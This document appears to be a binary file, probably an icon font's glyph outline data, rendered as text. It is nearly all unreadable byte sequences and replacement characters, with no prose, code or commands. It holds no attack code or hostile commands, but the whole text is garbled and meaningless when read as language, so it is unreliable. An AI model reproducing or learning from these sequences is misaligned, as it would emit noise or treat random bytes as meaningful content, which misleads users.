B1``�pp�``�p�``�p����A�,2"'.543267>&'&'6768'S�S''?D++D?'��!FG"%;?QQ?;%$'88'$oo==o����"%/&&?6/&6?6�%">H6 F&3
&)'H!.L	�C>"(	4949/!=	���	!)19AIQ#546;22"&42#!"&=463264&""&4622"&4&2"&462"&42"&4�
@
��(8
�
8(B//B/��Mss�``
m
8(�

�(8�/B//B3s����*5!2#!"&=46;26=4'&5463 �@(8
�@
8(C	D-+@@@8( 

 (8(2,:+ *$
�����'#"/#"&?'&6?627//�
j��j
�A	(	ARr3f&g�DD�g&���Qg��6r����#/;I2++"&=#+"&=#"&=46354+";2=4+";2'#546;2#5P	 	�	 	�����0`0 �				��h�PPPP����2"&4264&"264&"6264&"�Α�Α�C4&&4&���Α��*�&4&&4����
%-1573622#!>?"&546;2264&"75#75#�		�K		�

����8P8
�
j8@@@		�L		�
�
� ��(88(�
�[�@@�@@ �hT\7&'76?6/&"'&+""2+"'"'"'+"&=46;276;2276;2276;23$"&462�	DP(1d"dq
0

0�		:&&t&&t&&:		%JJ%�1B//B/�b9
"&
P			 	 	      	 	`/B//B����4j%2+"'"'"'+"&=46;276;2276;2276;23%"'&'5462+"&=4&"35462+"&=4&"#5#p		:&&t&&t&&:		%JJ%��
8P8	 	�8P8	 	
� 	 	      	 	 	
�(88(		

``(88(		

�
	`������ '&?66762%47#"&z	
��	
�(-6,!��2BIg


	�

	�>@4_6I&(&�-h����#22"&46/764.?64/&"7626'&�Α�ΑP!!�!!PP�RM	)�)��Α��-0((	((00�>-
-������3#"./.""&/&'&'&7>76676/676�%

	""
%2" #d
	

0)"2`>1(CS9"

�

�


"9SC(2="3	@#3����	1.7>>327/6'&2#!"&=46;7s-�G'I!`+
.#:?f		��		�I<A78;Z=L_�[�,�H	%]J��	 		 	�����/37;?W#2+"&5#+"&=4635"&=46;2346;235!355#!5#=#"&=#+3235463


`
�
`



`
�
`
` ��  �  
�
  
�
@
�
`



`
�
`



     ��    `�
  
�
  
�����$%#!"&7>;&5463232&264&"��`I<8(,<	�))$(8,����%�"2+"546;5.?4>;23'��(4@�	@4r�uW7��7Wu�PP������/7;%+32#!"&=46;5#"&?#"&?&5462+&"264#3{	�p		��		p�	^1
r(r
1V			`��
 	`		`	 
a	~~	�			�y ������"5#"'&"#"'&'&767676676'#'&7676763_'$+A
 
A+$'*$$*?#/++G0:

:0G++/#

%
$
	���� (3:AIQ\62"&47'"'".'&7&766267&'&'767"&#">"6727&'6264&"6''6'&#"#��77W$|$("
77W$|$W��%,� 2 B//B/�%�s5KK54
VV5KK54
VV
��	
#�
#
�%��%K/B//B?
#
	�#
	 �`O%#"&'4.#!"#"&=46764'.=46323!2>5>32W,'
��',,
	',�
$,

,$

$,

,$���+"&462'&'.=46%2.=476`8P88P>
F|�<|E
D�P88P8��#��"�)��@�%K2#"&'#"&547.547&5467&5463021>#"'#"&546320212�&*&*(&"�*&*&"&(�&��**	(.(	&��(	**x%&	(��+5HY%+"&=!+"&=&=46?>;2%!'.+":>54&#"!264&#":�
 
�
 
 �"9���9
"N	
�!06

  

60!2
& 222
�!	�#/K2#!"&546;546;23546;254+";2%54+54+"#";;2=32�

�@

 	`	�	`	�pp((((@
�


0		00		0�((((������*fz��7&?6/.?6/&6?>?6/.?'/&'&?&'&?676?676767676%&>76&'&'&/&#"&>76�#
NA	2M
+= %�




	�
	
 {
�}
	
	{ �l)

�.M
+=
NA	28+$�/4
C

4.+!	5d
	)6!+.O
����#+/3;2+"&5#"&5#"&=46?>;2264&"75#;'#264&" (8	08P8�8P80	0!�m�|((xM&��MY�((8(P	(88((88(	p"z��((�```��((��@�Qh!2#!"&=46332'.=4&+!46;2327>=.=46;5462354626&+76&+";327P		��			2"'��%�%$4

			 		��:D;	 		 	@	 *x!..p`%%�4$
v* 	0		00		`3	kS���'%"/&4?626/&#";2=37�		�

�		�

{U
p
 `
�

�		�

�		�N6
P@6����'8@HPX`%2#"'##"&5475&546323632#0#23'"1"&46;7#264&"64&"2$"264264&"264&"�%%%�%%  %%�%%%''���&%%&��			w			��			 			@			`%6%  %%�%%  %6%A A	@%6%@b			�			 			��			 			����7AE%'&?67&?'&?6'2#!"&=46;;267!463!2!�::$$U$$::	&�&	�
=��@���;;$$$$;;�	&&	p��P��������0&4?62'%/&4?2?/&4?2?������;��:��:��,jjjjjII�jjII����X%/.=32?654/32?&54767>3276=46;254632|N/<(V	��	V(</N!E
)!		!)
E:.7
1X:
pp
:X1
7.zm
&<�		�<&
m���!;G7"&=463546;22++"&=2#!"&5463!264&#52%"=4;2#�

	@	

	(	$	� 	5KK5Oq1����
�
		
�
		�		KjK@qOI7  �`26A6#!"&='.=4>3235#"&=46;2+325'46?"&v�	
��
F		�88		�		892��0�
+$ �

/_	0				0A?>]
+>���0%#!"&5467&546;&546;2654'6323232�#*��*#*%!/
(8%*O(**(#*%/!8(%*#���%62"&4%+".?622+"&=463KjKKjK��
k*P

�

�KjKKj�%
	���
�

�
������7%/+"&=&/&6?'.?>546;276� 
�	@	�
 �� 
�	@�
 �r
8O�		�O8
NN
8O�	�O8
N	����+9GUcq2#!"&546354&+"26=4&";2654&+"26=4&";2654&+"26=4&";2654&+"26=4&";26 (88(�@(88(@	@	((	@	�	P	!.!!.!	P	�	P	!.!!.!	P	�	@	((	@	�8(��(88(@(8��@		@�@@		q8		8!!�X!!X		q8		8!!�X!!X		y@		@�@@		
����+9GWes��2#!"&=46354&";26754&";26754&";26754&";262#!"&=46354&+"26754&+"26754&+"26754&+"26 (8%�%8(@(	@	�!.!	P	�!.!	P	�(	@	%8(�@(8%`	@	(�	P	!.!�	P	!.!�	@	(�8(@%%@(8�  		8!!8		8!!8		  		�% (88( %P 		 		!!		!! 		 ������(6HT\j7&>#"./&67632*#"0&'&567%.?>766676.67&'7676.'&6� ]F&
#YJ gu$$ dY�,
� SaAO6 ��,
 SF
.�"�,�+-2# $D&�'
91+
	
�)H!A`)��	�,'*(O	����.6>F3"&'.535.535.53546;23264&"6264&"6264&"�@	F\F	%@$@$@
�
@�((((((
&%,99,	2 &
1&
1 

 %&�((d((d((����04����%2+.#"#."#"&=46;546;546;232%3'#2+/+"&=&'/&?&'#"&=46;67'&?667546;276264&"'2+/+"&=&'/&?&'#"&=46;67'&?667546;276264&"p		'0&CBCLC			�
qSJ
���3Q0	
	 	
		
	 	
((�	
	 	
		
	 	
((�	 	"""	 	P	`
h
@`@�� 	
		
	 	
		
P((4	 
		
	 	
		
P((����6:BJ%2+"&547#"&547#"&=46;546;546;232%3'264&"264&"p		2B\BDB\B2		
�
qm0
���M�((<((�	 	.BB..BB.	 	@
�
�
@�``��((((�
0H?62"&472#!"&546326/&+";2?33754&+"&#"327;26����`�	66	F�		**
	�55��� ��
��
�		$*<*	��@�#/%2++"&=#"&=46;&5462&">54(

`
 
`

-%JlJ%E,�
 
�

�
 
;5AOOA5;�"9!(����:B%#!"&5463!2;;26=326=4&+54&+"#"5!"3�

��)77)F��	0	 	0		0	 	0	��
Z	4
	7)@)7v 	p		p	 	0		0	��@����/3B$2"&454+54+";2'"!546;546;232&'5#!"&=33�xTTxT�
&


<
@7.�uP�P	������	�TxTTxB
6

L
� P001`  �*&�0	����-9EQ]iu�����2#!"&546;546;23546;23546;254+";2=4+";2=4+";254+";2=4+";2=4+";254+";2=4+";2=4+";254+";2=4+";2h

��

(		@		@
�
��((((((�((((((�((((((�((((
��

h
P		PP		PH

��((l((l((�((l((l((T((l((l((��((l((���T2#"'#"547>7&54>'./&54;2?6&'&'54&+"+"'&;265�Ԗ�j83AL92	 		2	 		�z�z329JV�%						��B�Og#"'#"54767&5462;2=>54./&54>;2?6'&'54+"+"'&#"'#"&'32654'�zV<3+.&z�f-	-	Z.+3<@hc�9HB�^)3B^�	



�
6,qO

P23����#2++"&=#"&=46;546;2`

`
@
`

`
@
@
@
�

�
@
`

`
���W]ciou}���%2#'"/+"&57&'"/&4?&'"&=46367'&4?6267'46;2762'7&'67#677&'7&'6264&"67'367'?&'�

$
/;		;/
$

$
/;		;/
$�
+Y%+
l@	L1	C
+2:%+
l@	@1	�		;/
$

$
/;		;/
$

$
/;@	11	%
L%+
�@	1w�1	%
H%+
���-T7"&=46;2#546;2+"&2?#!"&=%5!'54767546;>3232�		�		�	�		�	F4��`�`��`NN�				P				r��՗�
F��F

,		,�!2#!"&546;54&+";26��`�@`	�		�	@� @�				�52#!"&546;54&+54&+"#";;26=326��`�@X
@
	@		@	
@
@� @�	@		@		@		@	������Z/&='&63!22"&4>54&/&546;2?6'&'54+""+"'&;25�?R;#P��y�^^�^�-		-	gCQ9	<��''�^�^^��

	

���eoy%2+5#5#5#33#54&+"#53535####"&=46;546;546;54623546235462354623232'354&+"54&+"�		P     P	@	P     P						@		@		@				�0		8	 	`	�	��``��P		P��``��	�	p	P	p								p	P	p�00		�@		@���1?G%"/&5476;5462;2=462;2=4623226?."62"&4�	f8�8f	@ 

 

 @��00200=�
	n<<n	
��

��

�Ѐ $ <�����2D%/#"/#"&57"#"&?'&6?'&676276'7'7''77'�
bK	
lDDl
Kb
n*^""^*/$/5--5/$4!!�5S
qYYq
S5h
<k

k<
h}(2332(6**6��0��%#"#.'3'&'45473'676327#"'&54?'&4?'&543243127632#"/>7654'&547654'&54763231!�QM(;/)V
:)9+****%5):
	V)/;`HXWE;	
)f<G+%7-D	A!		! ��!		!A5%
7%+G=f);�����%#!"&5463!2!"3!0#"/267#"'&54?<14'#"54?&''312545'764/7454#"#'4"'"#"32?.547&547#"/�
��)77)FC��
�%	=N=	%

		
F	4
	7)@)7�� &11&  #	
po	! ��A�-<JX%&54?626"/.=54&?6754&3766=4/&'6=4/&*����� ,�

��PP�``�PP�``l1PP1OmR�66�"-$���nv~/612#".5'"&5475#"&46307'/&'&6765'&?.5467'&?7>54'&54764'6'76/�82
5P/
))
	

/P8
/<		&!M,;;,L"&	U

�~s?'$=
*!
	

		!*
AE� 	

(/(F6$	33	55	33	$6F(/(	t &&""&&���'7#!"&=4?62335335332!546;2#!"&=463�
	� 	
��@`@`@	�@	�		� 		d%		%Z������	00	`	 		 	��@�'9=L:767#!"&=72"#".'.'5463%2+5.+54635#%#5463!2#"�*+ @
�
@ �
,)"	),


�$`
 @��`
@
�& 0�

�0�
!	"
`
�
�! 
�@@` �

`&����	'2=HS^it�2#546;2#546;2#546;2#54636"&546?"&546?"&546?"&546?"&546?"&546?"&546?546;2+32#!"&=46;5#"&=46;2;546;2326�	@	�	@	�	@	�	@	} s s s s s s 	 	8(��		�`		��(8	 	
�	 	�
@	��		��		��		��	 
 .

 .

 .

 .

 .

 .

 .
Ӑ		�(8@	 		 	@8(�		�
�		�����	CP3+"&%!&5476?2+54&"#54&/#54&"#"&=463#5467�
@
C��XE++EX

 @@ 

��  @��
�C8+5

5+8C<
�
@

@H$
&H@

@
�
@!  0
�����h�'&4?6"2#".5'546326=4&"+#".5463264&+&/&6;264&#"/&47632?6#".'&66iR;;%'
#/
)K5*A$!1 &&!			 

(8%	/
q%
&'5��;)d$4
&+	d
!5K01&4& (&
$'$
�	
$	

���������$&#".'&'32#".'"'#"&463267&'#"'&&'&4>7>6767&'#".'&#"&463232>7'.5462627&5462327>32#"#"'7>"264$"264g
!	 

(

(

 	!



*#%6%:%6%#*


�			��			h	

#8-%%-8#
	

!4"%%%%%%%%"4!

'							����2"&44&'657677�Α�Α�WA��Y&s3&�+E(���Α��gCg�g)�rG"ir	"?3N,/)g����,%+54?#"&5%#54&"#54?54?6m	p�mp	�`%6%`0	LL	Qd	�L/�	�	�`%%`�	s	KK	s����/?2#!"&546354&+";26754&+";26754&+";26���p	 		 	`	 		 	`	 		 	���`���		�		�		�		@		@		����/?%#!"&5463!2326=4&+"326=4&+"326=4&+"���`���		�		�		�		@		@		`p	 		 	`	 		 	`	 		 	����("&462'+"&46;'.?67676&6%%6%_#n�\- 1&(':!
X!@%6%%6�An1"#G!\!./
!H
������(Q2#"&=4?54?03>26=4#"/.=46226=4/&67621/&�Zu
M		z�&/		M
u
�'?
/`Q��M		P
�`/
?'�

P		M�
�Q����1NV%#!"&5463!2"3237232/76&#/&"'"327654#0"#"&463:1324#&5!"3�

��)77)F�;/DD/'88'u��
Z	4
	7)@)7xCC`C8N8��@���$_%"/&=#"&462322654.#"7+"=&'&?6;2654/.54>354;2'&+"�d8HVzz�z,
��xT'B'<T�	-	d
,z�zzVH8	T<'C&TxE



���$0;%"/&=#"&462322654.#"62"'&54264&"�d8HVzz�z,
��xT'B'<Tq>+CCJ
d
,z�zzVH8	T<'C&Tx�+$OO$5
�����%47#"&'&6?535#546;272#546353#"&'&67�( .
W��
��
�
 �3s -
�^)!HA���  

  
���@&W!H��G�;%//&?'&?67672+#"/#"&=46;2>3;........

�b X,

Q
:U�........�
0
���
0
jC
���92#"&4632#0&#"3267#"/#"&?'&6?62T	+.j��j.,
W||W�7
DD
7L""	�Ԗ
|�|�6L$$L6EE������ &),/25%+"/#"&?'&6;76232#'#3373'7#73'�5k8*8k55k8*8kB( 5p55p8.�((�.�(�Y$^^$YY$^^$!7XXX&8!!�!&8!����	'E762#547!#762'#54&#4?6'76&+'&"#";2?326F&�r�&�`-`�H''''�+���

�+�f
��`'&]z
f�((((����EQTW]%'37'$2"&54737!;32?327654/7654&+'&#1"#"$2"&54#''73@$Q��((�|�����	<<	<<s((�$,B!!B!!R��
�@

�
�����`11
1

111
1

1�
�@

�
o8888���59=27+32++"&=!+"&=#"&=46;5#"&=3355#xH@
 0		0	 	�	 	0		0 
@H`�`� `
@	 	�		��		�	 	@
` `@@@@@������@DH%+"&=#+"&=#+"&='&'&?5'&4?5'&6?%35!5!y7	 	�	 	�	 	7Y7		w��w		7����@��/
0		00		00		0
1@2@VV@2@�@@�@���-6/#"&=46;//&?'&?676�Yf

fP-..--..y��Y
�
`.--..--����%2"&4264&"&264&#"3"&462"&4�Α�Α�P88(PppP(8S��Α���m8P8p�p8P�����@�4DL";#";#";!!&'.7>/762#!"&=463264&"����ri����p'
FF'--[%
��
%��@@@`@��
M�N	
?JJp% 

 %`����0LT\"&462#!"&5463!2";26=654??6/76/&'&5!"3"&462			�

��)77)F�B/ 	@	 �GGbbFFbb���
w			8			�	4
	7)@)7& 
		
 �++**�@8			���� #!2#!"&=46;'&?676%3p		��		�5	

))


	5��t�	 		 	JJ
		
88
		
J�������-7?G327+"&=32+"&54&"&4632>?"&=264&"264&"#!*	 	� 
	�&
(833�@8P8@			Y			&�		�`
	&
8(V'`@�(88(�@P							������7#546;2#54'#5##5#+"&=!+"&="&?63!2p0K5@5K0(000(N	 	�	 	
j@��5KK5��.������p		pp		p ��B�<%+"&54674&5463263276&'654&#"&'&54632W*/!�(8$8(,
&�5T%8(
qO#)m_.!/8(1
(8&'A$(8
Pp
F)F[����DQ%#!"&54674&454632632%&?'&4?'&676276&'&"74632.?$8(��(84%B."6&�R	L	
SS
	X))X	

	!\B1#)
;
'z
1(88(&6.B$
&
	X))X	
SS
	Y
!B\.#1$D/
������ '0:EKO7'"&?&=46&63''&4?6#76276/&>2".=7#'3'kl�MA�rQ�	=m__}LP��uj�ddd�8�.�BY1b	����z�b��WBߜŰ�����#'&4?66&='46/&5����  � ���� R
ww
e��&]

�mt�

]& �� �4<%+"&=#+"&=.54623%+'54632324&"2*�	@	�	@	$
�& �5	@	p			�6�		pp		�
1
p &$.�				������AG7&?>#"&?#!"&547>7.='&4?'&6;2+"/#77		u*x�[ #H0�

GU�Z-3<<>�
K		@�uW+*)EB<#/@
_6m
2

c	
	%����(&#"+"'&7'&4632?54762�3HV(	#2"#(?2��3I	X!
)#"1$	(VO?2��� 0@P`p�����7+".767>%+"/&67622+"&=4632+"&=463/.7676"'&'&?6#''&'&?>2+"&=4632+"&=463'62+"5'67+"5+"5�
a%*%@�		`		`		`		�		S*
�
S
*S		$
*I		`		`		`		�

@��

.+�
hh
��	@		@	�	@		@		3$�

3+.
�3	Z�	@		@	�	@		@	�����������-Ohq;#!"&546;54+";2=4+"&=46;22654/&54;2=4+"+"374+"276=4+"&57#532�
�
��

�`		,`$$y�
8
��

�
�� 	 	`x7''7�
�����CO_o#"546;2!5'&=;27;2732?>72=4+"&546;2'&+546;2"&=46;2#3"&=46;2#0	 	�$�%   
#	p&  	 	��		 		@		 		 �		�X($@@%5N	(			%?p		�	�		�		�		�	����&.6/&/&"/&&546264&"264&"�Rt
+))+
l��qQ��	0..0	Pv�����G�'%/&?'/&='6276"&47%;Z$1Z/�/-	��1�4%��Z	1-//-$1�%4�����'/mx��������32#54#32#54;2#54;2#54#54;2!32#54!2+32#!"&=46;5#"&=46;2;546;2326=4636"&546?"&546?%".546?"&546?"&546?2"&546?"&546?"&546?"&546?� 8 � H ` �H 	8(��		�`		��(8	 	
�	 	�
	���(
C�2(
 xxxxxxxxxxxx	p(8@	 		 	@8(p		p
�		�
p	 

'

' 

'0

'

'

'

'

'

'���#+!2#!"&=4637#76?#?/7?/�		� 		��o$�8V�@@  @�    	 		 	@ �&k�


�   @@ �   ������JR7#"'.7/.?>2+"&=#"/1"&='&54?>3235463&"&462Q#4@:!�			0
/W	 /#	\((�5e
�b"+	��		�	P/S

SV

k/	@((����>F2#+"&=#+"&="'+"&=4632546;2632>264&"E
	 	�	@	3z3	@	pPI7

#�			`\
 		 �		GG		�B^)1

	P			��A�IQ&/0+"&='+"/&54?&5457+"&=4636;46;2264&"@! 	@	�	B		4$+�K5x	G			sM
	&f-!�		�@idD)
8		8$4!5K	 			����G�43+'7'#"&=265%/&/&7%62546;2 �	�(h�<h%�	���
e	@	M��	7@�w@I	�H�

��

Z4		�����Z%#32+;2?6+".'&7#"&=46;7#"&=46;7654&+"&/&6?6;232pd"�		�	T	%O#	*		d"�		�	T	%O2*		� 	 				
.0	 	 	 				
.0	 	����!+2#"/&"#"&7676276'&"276'&"A�J2??&'&@OarJO^!		!^!		1^!		!^!		�mIWH
8&&8�P`,�)))))))����#!"&'&5476273{	��	 
"
f&@U			�L�&@����KOSW%+32+"&=46;5!32+"&=46;5#"&=463!5#"&=46;2+!2%35#5#!5#�	h8

�

8��8

�

8h		H

�

H	����@`�`�	(
�

�
((
�

�
(		(
�

�
(	x@��@@@@������>FN2+32+'32+";2+"&'&76=46;76;2"264267#7`
8(\7
	PK�@
	�		p

l0(pP8�
9			Mwf�
 (82n
	�P
			%*&.PpX
			W;7�2"&=4$"6265427&"�ړ�ԖP�pI�I��9�9:��R>b;SS;b>/!

**

!Z����B"&462+"&46;%2+"/#"'.?'.?'&.6?6$((�

 M

C

6
 >U
%
(
'%,G*`((��)N$	f
W2
.W
(5����
&2#"&=4&54'!2!!2#!265(P	-P(8�� P	B.��(8�P	@�&'p8(� 	.B8(������#7?G/&/&6?'.?>76'.5462+"&76"264&"264�
��
��
��
�� &TxT& ~
��
ZZ
EE
ZZ
E�:"5KK5":

�������&?6S��	
M	
=�

	�9

����G�o�'&54?>#/#+"&='"&547+"&=4?#/&?6;'&/&?637>23?632/&6?6#'&'��	

	0/=		J7R7J		=/0	

	4
NE
5	

	2=$
$
$=2	

	5
EN
s6NH(�		
Ha	N		Iw
(==(wI		N	aH
		O	P		
L44L
		P	�HN6	����@�$,4<DL!#!"&7>=46264&"264&"264&"264&"62"&4264&"�	��
	8			I			I			I			�P88P8S�:J)�1
	
�Pp�															�p�pp��%6%%6����ksx$2"&4264&"2&#"#+"/+"&=&'"/&4?&'#"&=46;67'&4?6546;2354762264&"73'#�H44H4Nh
	3;$Q
	
	,	
	

	� 
8f	
�oB//B/fn)kp4H44H<
3
	30	
	

	
	,	

��(.$

(�/B//B�``����
 (<#>32#7"&547367#'547"&%2+'72+654&+'327ZR@(\gB6jK���b�P0
*q7OP/!F*#L#�D$,P2�K5

5w�0*=)�D(`�O7*!/`��$,2+"./&"+"&5463264&"264&"`

�

:
 �

e6%%6%e6%%6%�
��
	==
@
�%6%%6%%6%%6��
� A[72#"&'&6;232>'.+"&=4635"&=463!2676&#"+".7>#2&'&6;23264&+&'�%9:+#5
 
�				N !26(	:-06D
/+H
"
t�/$,A,"

		 	 	 	
	'(.G T7.
+'
(&���'"/&4?>7&?67'�M�5Z�N#L��zZzwL#N�Z5�M�^zZz���-W62"&4$2"&4'#"'"'#"'&7&47&66266+&'&#&""#"&5467&54632632:12((�((G2$2#�8(+	<	+(8%B. 5%!/(`((((2

2#$�P8
	
8(2

.B!/!	��B�8ER_l%#!"&5467<146326326#"&"'.'&'>32#"'&?>#"'&?>#"'&?>#"'&?>^%/!�!/%8(1,�+E+T:

%2�$	%
[$	%
[$	%
[$	%
�,!//!,(8(%5#+:P
5.�@@@@@@@@���+;J2#!"&5467&54632632:62"&546762#"&546762"&54>�(88(��(8%B. 5%!/��"("�"

"�"(@8P88(2

.B!/!	�232
32
 �����
)7Ec6#"'.?>#"'.?6&#"'.?6$#"'.?6&#"'.?672#!"&5467&54632632:�@	@m@	@�@	@�@	@S@	@;(88(��(8%B. 5%!/Q
p
p
p
p
p
p
p
p
p
p�8P88(2

.B!/!	����@�EP]jw�%#!"&5467<146326321&?'&4?'&6762760"1"&7&54632#"'&?>#"'&?>#"'&?>#"'&?>�%/!�!/$8(1"��;GGK##K	% Ib&D$	%
[$	%
[$	%
[$	%
�,!//!,(8(5K##KGGP&
�@@@@@@@@������1Jc|�%'.'!'+"/&?67&'.7676326&#/&""?65'76&#/&""?65'76&#/&""?65'5!+"&=#+"&}	

	��6&

	K	+*
Q�&C��
�
�
��`	@	�	@	�
		
	Nl#	c#
	+**Q$ 





퐐		PP		���
1U]emy2+"&54327.5>7327&'.5>7&'327&'.5>676.264&"6264&"264&"7264&"	 	,>&3=1S?AW3+O-%>&3=+O-%&.T,+O-.	5!6H+O-%&.T,1N.1(A( 4$)�							I						�
�0		�
��$
E	V>		
=	t!E		
�

	(			/	


9	


/	

���%-7?"&4726767632676324&"2'"&462"&462� LB9�r9D�[a	�KjKKj5 			�a[�D9r�9BL 
��jKKjK�

I			��@�	5=RYf53+"&2+"/#".='0&5#".=46;2&"&462753"&5#"&'#"&?'46;#%2+"&5�@	 	 

:)
	
		&-Y((��

�
 @`
	 	0��		Q=
8
		8+e
		�`&-`((D �`


��
��
�0		�����M%2#"&?#".576;27+76'&+76&+"#"&5467&546;2654'632324X;
D|+/!


D0!/+
&!/	(8&p�	ax
	Ao.!/"x/!.&/!8(&��@�<Z6+"&=4&'&+"&=466+"&=4&'&+"&=466+"&=4&"+"&=46S�S	 	oSf�	 	�lW�	 	B19T	 	_N5 	 		 	+�K�Q�		�V�
�e�		�t�ZtV�		�3NM8�		�JrW0�		�

�		�#9����	";T�!546;26&/&"?6/76&/&"?6/76&/&"?6/2'.=#+"&=#+"&=!26=463 ��^B�B^��

�

�

�	)) 	`	�	`	 			@@B^^,





�	@'1 +p		PP		�p		@	����/G%2#!"&=4632+"&=463!2#!"&=463'"&4632632632+"'p		��		@		�		 		��		P<TT<=++=(D.BB.<%^%P				`								�TxT--*"B\B  ���/A2"&4264&""&54754622654'54&"7"&54675462xP88P8S� TxT B\B�B/ ( `(		�8P88PH�(2<TT<1)�.BB��/!(��(!N�		���/A2"&4264&""&54754622654'54&"7"&54675462xP88P8S� TxT B\B�B/ ( `(		�8P88PH�(2<TT<1)�.BB��/!(��(!N		����+;%2#!"&=46;#"3!2=4+5!4>3!2?6/&'&`

��

@

�

 ��	@
��J�_)�
`

`
@@@@	
�K^)��@�,X�%#&'"'"'"&=46767>7>7627#&'"'"'"&=46767>7>7627#&'"'"'"&=46767>7>7622+$)l+)l+)
!
X

Y
!+$)l+)l+#,
!
X

Y
!+$)l+)l+#,
!
X

Y
@	 
	 				�	 	 				�	 	 				������%="&462#"/&4?7#"'.?'6#5&/.>2?6�B//B/�


0	.=u.	0


�)�) )'b') /B//B��'
!
@9339@
!
' � 

 		���2:B!46762+"&547"'"&54>7&5!5463264&" 4&"2�o�0+!h		0<"/B/!F!/B/<�&��`��6`"
\	 	@K8+!//!
		
!//!!8K@&������B�
 go"&'62&.'632767632&7'&'&'&''&4767>.&76767&547632>54'&6264&" 	'V'	�%,5�4,$k6+`2+=66>+2`+6
)F2!7 )
�((P

��P/C**C/P� =	Xb	  bX= ?13H!8"0@�((��� 4I7&=46;22654.'&=467+"&5.'.=46+"&5.'".=46�:D
	<)Ej
0
(	0z�	 	�a	
Sv	 	S9
�d=)<	WD�

�
2��z
	a�	 	`vS
:R 
����	7!#!"&7;26=4&+"%2!546;546;23546;2���@	`		`	P�@0	 	�	 	���`		`		�000		00		0����	7!#!"&73!26=4&#!"%2!546;546;23546;2���@	 		��	P�@0	 	�	 	���@		@		�000		00		0�����")-15;C#"/&67%>'&#"#"/&6?63267'7'?'?'77&'67'�)6��
 a				!%,.O��=�<�<Q	-
$=d9w!�6�718>=��'''�.
	�	�����*'&&'&7276/>76/&67*."'f91��3
7S�DX!"&#b.&291B		
28 &"!XD
�����+;K[_o���%#!"&=4?>;5#"&=463!2+32;26=4&+"";26=4&#'#";26=4&'35#26=4&+"3;26=4&+"54+";2754&+";26754&+";26�	�@
U`				`��				 				0				���(				 				���				0				E[	
[�@	`		`	@				G				P				� �				@				�x				W				���+@V72/"/&4?'&637"&=46762#/&=46;26+"&?'&4?62�
c
c!�
c
c!cc
p��
p!c
c�
p!c
c@
p!c
c�c
c!p
p
c
c����B�C#'32%#73#5"&?6;2++"&=!+"&='#"&=46;'!0ac	��~�~��	c�			 	��	 			 �`������`�@	 	�				�	 	  ������	%?N^#53##7/32210'&/&"&?6;#+"&='#"&=46;'%"&54676>'&'&'32�=d�~!c
�'	c�51�	 			%4^�^D4('?3&X���H
>``� K7H6		�	 	 !`A]]A&m/$(�?/S!('1�32+5##5##5##5##"&=46;546;546;232�		P @ @ @ P		0	0	�	0		�	��������	�	0	0		0	0����7>Eeoy7#"&546;'&?6'&6?67>763253#"&53#2#5+#546;&54632632#3&#"7654&#"36�
	�


			  
		)��
�

��
( 7!!7 (�5	�	5��
`
	


	66

��`��`
 
`��`
,KK,
0		0������9=A%'&6?'#"&/#"'/&7>7.?>76767'7'�
'(??('
�'%WrrW%'��_$�p$_C	h.'KK'.h	C	fW(�
00
�(Wf	G'@..@'�����2#!".'&63!!�8��8���9���e@�����cs�2"&44&#"+;2=732;2?6;2;2=4?6=46;2+";2;6$;2?6=4&">7#"/&+'&+";2�Α�Α�uS(	

	% 

		 ��
	}5W
	
+ +	��Α��gSu	

	
		
			!�
	��8-
%

` %2#!"&=463%2#!"&=463�		� 		�		� 		�	 		 	�	 		 	 ����+"&546;2+"&546;2`	 		 	�	 		 	0		�		� 		�		�����+3.767>7676?6?62264&"�		/$L
#
#kS#&"7L/		��((�		/L7"&"Sk##
L%/		��((�����"/&6?>'7'6�$!��!$"b&`�0`"&a"v%i(��(i%#W@��@h#������@j"&4622462"&"&462&54'&>367>'&'&636762'&'.7676&'"'6'&5<546�((@(((((@	72		94�	27	
	49	((((`((�=3


:2
	�
1:
+3	

���/7%+"/#"&'.+"&=4>?6264&"�.	
3
./	7")�
%B0�
0%zt(	
@
 &R
Q?bU;K
6!8�����"'"/"/"'&63!2�WB.".,$W���,l����}��@�'08!>32#47%#534'3+#."#553#"&62#54@��'~J�`Bp?��B��
� 2:F:2���
�P8��~;E��C=�_��=C@`
 �##��``�8(``(������%2#!"&=463$!'&>76p		��		e(H��0@te
 	@		@	�"5W�:e@:����(:B&'&'&6;2+"7&'&'4>;2+"2++"&=463264&+#

n#
�.BB.8(�(8
p.#1,#1, B\B(88(�
�(`������"/%4'7>#"'.?2&"&462%"&5>76H&Q,6	�Q7|7Q-((��	6,Q&�,� `8
D�

� ((
8` �,����&.6>%4'7>#27"'.7'"&7676"&462"264"&4628*4�$*"H"C
4*�Α�Α��ll�l��#C*B6

C

y
B*C#��Α��l�ll�l ����)9V"&462"&462++"&=#"&?6727%2+"&5463++"&=#"&=4672�4&&4&Z4&&4&?7
0
7.8��		 		|

P

8@&4&&4&&4&&4��h

h��	� 		�	��
�

�
������;?C%"//"&46327'&676327'&4?6;2762%7''�a		P
k
l*0)&
Q		a	

	P0

/

0Q	��IEI2EID�a		Q
&)0*l
k	Q		a		Q0

/

0P	hIEJ�EIE�����6Q.7>7&5462#"'%1+".5.'.=463210+".5.'"&=4632119�bu
C	 �a		z�Z	 S9		Sv b�9t


+	a�	 	�z	:R	 	v����
2#!"&575#35#35#@&&�&� 0�0�0�&��&&@��``````����
#*.546;#!"&575#354&+326=#35#;5'!5%35#"&��&�&�@�
  
�@�
 @�@ 
�&���&&�@@ 
@�@
 @@ 
@`@@@ @������(2O2"&42+"&46;264!6"/&627"&4?"&46;2"1"&='&6?|(()	`		`	��'DD
=\		0

�R=N�((�\				DD�	\	
�1S=Y

SN8�����$C"&462#"'%.>7'&776'&76776/&//'�((%�x			�.Kk(

1���#>R04	: s/`((���fEK5(#JFa 3		
9��@�.BN"&4622#!"&46;0&5&6?63232647'.?'&3737#"/d((�*� 

+6
(%,G*,
F
�U
%
'4>+�!
 =`((��
*
(5
�"Q2
.W
���

[�)N$	L����C%#!"&=463!2654/&?6%5"&46;2;26=32###5##5.e,��			



��

&"	/= &`

8(@�@*6a&'		


w�	,&@`(80004E�����6Wy2#"'#"&'&>7&542654/&54;2=4+"+"3754&+"'&+";2=2?;232654/&54;2=4+"+"3�Ԗ�j83AL9��	

	
0�z�z319JV�h		##		hD88D�����EQ"&462'76#"'%&'&>&'&6?54?'&/&>#"'&7�((TB4Z		��!&
J#*		?o
�<U�`((�?'f"�!			
5(:4S

--=

�����T\dlt�+"'.547&507'.?>54>;2167&5462704=46;276$264&"264&"6264&"6264&"7654&"6264&"��!	#%c
!&,�	8	
8P8
	8		
��			)																(7
"-.QC(?,
